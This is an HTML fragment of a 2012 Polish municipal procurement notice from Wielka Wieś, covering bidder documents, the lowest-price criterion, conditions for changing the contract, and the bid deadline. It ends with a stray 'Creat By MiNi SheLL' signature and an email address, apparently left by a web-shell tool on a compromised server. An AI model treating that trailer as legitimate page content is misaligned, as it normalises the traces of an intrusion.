<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz OFERTA - załącznik nr 1 do SIWZ.	Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika 
z innych dokumentów dołączonych do oferty.
	Oświadczenia i dokumenty wymagane postanowieniami rozdziału VIII SIWZ.
	 Kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu: Zamawiający dopuszcza możliwość zmiany terminu,  tylko w przypadku wystąpienia okoliczności nie wynikłych z winy Wykonawcy, w tym między innymi: 
a)wystąpienia warunków atmosferycznych uniemożliwiających realizację robót 
b) wystąpienia zmian parametrów projektowych opisanych w SIWZ dla wykonywanego obiektu
c)wystąpienia konieczności wykonania robót nieprzewidzianych.
d)przedłużania  się prac związanych z prowadzeniem  badań archeologicznych 
 Termin wykonania zamówienia zostanie przesunięty odpowiednio o czas:
a) wstrzymania robót ze względu na warunki atmosferyczne
b) niezbędny do wprowadzenia zmian do projektu
c) niezbędny do wykonania robót nie przewidzianych.
d)wstrzymania robót ze względu na przedłużające się badania archeologiczne
 Zmiana terminu powinna być potwierdzona protokołem konieczności zaakceptowanym przez Zamawiającego i podpisana przez Zamawiającego i Wykonawcę.
Zmina wynagrodzenia: Potrzeba wprowadzenia zmian może wynikać z następujących okoliczności:
a) ustawowej  zmiany stawki podatku VAT
b) wprowadzonych przez Zamawiającego w trakcie realizacji przedmiotu umowy zmian dotyczących technologii wykonania
c).) w przypadku nie wykorzystania w całości kwoty umowy o której mowa w art.12  niniejszej umowy w związku z nie wykonaniem robót uznanych jako nie konieczne choć objętych ofertą Wykonawcy oraz SIWZ, przy czym ewentualne obniżenie nastąpi w oparciu o wartości wynikające z oferty Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś, pok. 211.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś, Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com